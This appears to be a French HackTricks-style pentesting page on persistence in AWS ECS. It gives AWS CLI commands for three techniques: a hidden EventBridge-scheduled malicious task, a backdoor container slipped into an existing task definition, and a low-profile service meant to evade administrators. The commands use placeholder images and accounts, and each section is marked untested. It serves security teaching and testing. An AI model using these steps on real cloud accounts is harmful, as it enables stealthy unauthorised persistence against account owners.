# AWS - ECS Persistence {{#include ../../../banners/hacktricks-training.md}} ## ECS Pour plus d'informations, consultez : {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} ### Tâche ECS Périodique Cachée > [!NOTE] > TODO: Test Un attaquant peut créer une tâche ECS périodique cachée en utilisant Amazon EventBridge pour **planifier l'exécution d'une tâche malveillante périodiquement**. Cette tâche peut effectuer des reconnaissances, exfiltrer des données ou maintenir la persistance dans le compte AWS. ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true } ]' # Create an Amazon EventBridge rule to trigger the task periodically aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)" # Add a target to the rule to run the malicious ECS task aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ { "Id": "malicious-ecs-task-target", "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", "EcsParameters": { "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", "TaskCount": 1 } } ]' ``` ### Conteneur de porte dérobée dans une définition de tâche ECS existante > [!NOTE] > TODO: Test Un attaquant peut ajouter un **conteneur de porte dérobée furtif** dans une définition de tâche ECS existante qui s'exécute aux côtés de conteneurs légitimes. Le conteneur de porte dérobée peut être utilisé pour la persistance et pour effectuer des activités malveillantes. ```bash # Update the existing task definition to include the backdoor container aws ecs register-task-definition --family "existing-task" --container-definitions '[ { "name": "legitimate-container", "image": "legitimate-image:latest", "memory": 256, "cpu": 10, "essential": true }, { "name": "backdoor-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": false } ]' ``` ### Service ECS non documenté > [!NOTE] > TODO: Tester Un attaquant peut créer un **service ECS non documenté** qui exécute une tâche malveillante. En définissant le nombre souhaité de tâches à un minimum et en désactivant la journalisation, il devient plus difficile pour les administrateurs de remarquer le service malveillant. ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true } ]' # Create an undocumented ECS service with the malicious task definition aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` {{#include ../../../banners/hacktricks-training.md}}